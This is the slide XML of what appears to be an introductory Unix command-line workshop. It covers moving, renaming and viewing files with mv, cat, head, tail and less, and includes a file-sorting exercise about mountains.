              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>file or folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;source&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to the location specified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;destination&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; you will only have one copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;source&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Examples:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400300" y="4401410"/>
            <a:ext cx="4343400" cy="1438275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352363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Materials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>exercise activities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>from this workshop are available at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com/cmmann/20170301-unix-basic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Supporting materials are available at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/cmmann/20170301-UNIX-BASIC-MATERIALS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>You can download this PowerPoint and follow along on your computer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>You will probably benefit quite a bit from downloading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(and using) the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>cheat sheet!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33009000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3.3: Rename</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="8387934" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv &lt;source&gt; &lt;new-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	You’re “moving” the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;source&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>file into the same directory, but with a different name!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	In fact, you can do this when moving a file as well: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv &lt;source.txt&gt; &lt;destination/new-name.txt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4485509"/>
            <a:ext cx="3705225" cy="1344859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3705225" y="4923659"/>
            <a:ext cx="5438775" cy="1924050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36848007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3.4: Viewing File Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Commands: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat &lt;filename.txt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head &lt;filename.txt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tail &lt;filename.txt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>less &lt;filename.txt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What they do:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>outputs the entirety of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;filename.txt&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to the console (don’t try this with large files!!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>outputs the first 10 lines of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>outputs the last 10 lines of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> “opens” the file in the terminal without printing it, and lets you scroll up and down. Exit by hitting “q”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1463906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3.4: Viewing File Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>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head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> also have an option, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, to output the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>lines and the last </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>lines, respectively</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1419225" y="3244512"/>
            <a:ext cx="6305550" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600150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 Moving Mountains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1447800"/>
            <a:ext cx="7886700" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>list the files in the directory in such a fashion that you can see the file size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Each file contains information about a mountain, including which mountain range it belongs to and its elevation, and in some cases, how deadly it is. Based on the size of the files, determine the best method to use to determine the contents of each file (i.e., should you use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on that 409KB file?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. Determine which mountain has the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>lowest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> elevation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4. Create a folder for each mountain, that contains the name of the mountain range it belongs to. Example: For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mount-Everest.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you will create a folder called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Himalayas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5. K2 has two other names – Mount Godwin-Austen, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chhogori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Create a copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>K2.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chhogori.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in its appropriate folder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6. Then move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>K2.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the appropriate folder, but rename it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mount-Godwin-Austen.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7. Move each mountain into its proper folder, no renaming needed!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8. Create a folder called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>deadliest-mountain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Copy the deadliest mountain’s file into this folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hints: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember that you make folders using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What option do you need to use with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to see the file sizes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will probably have a happier time using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
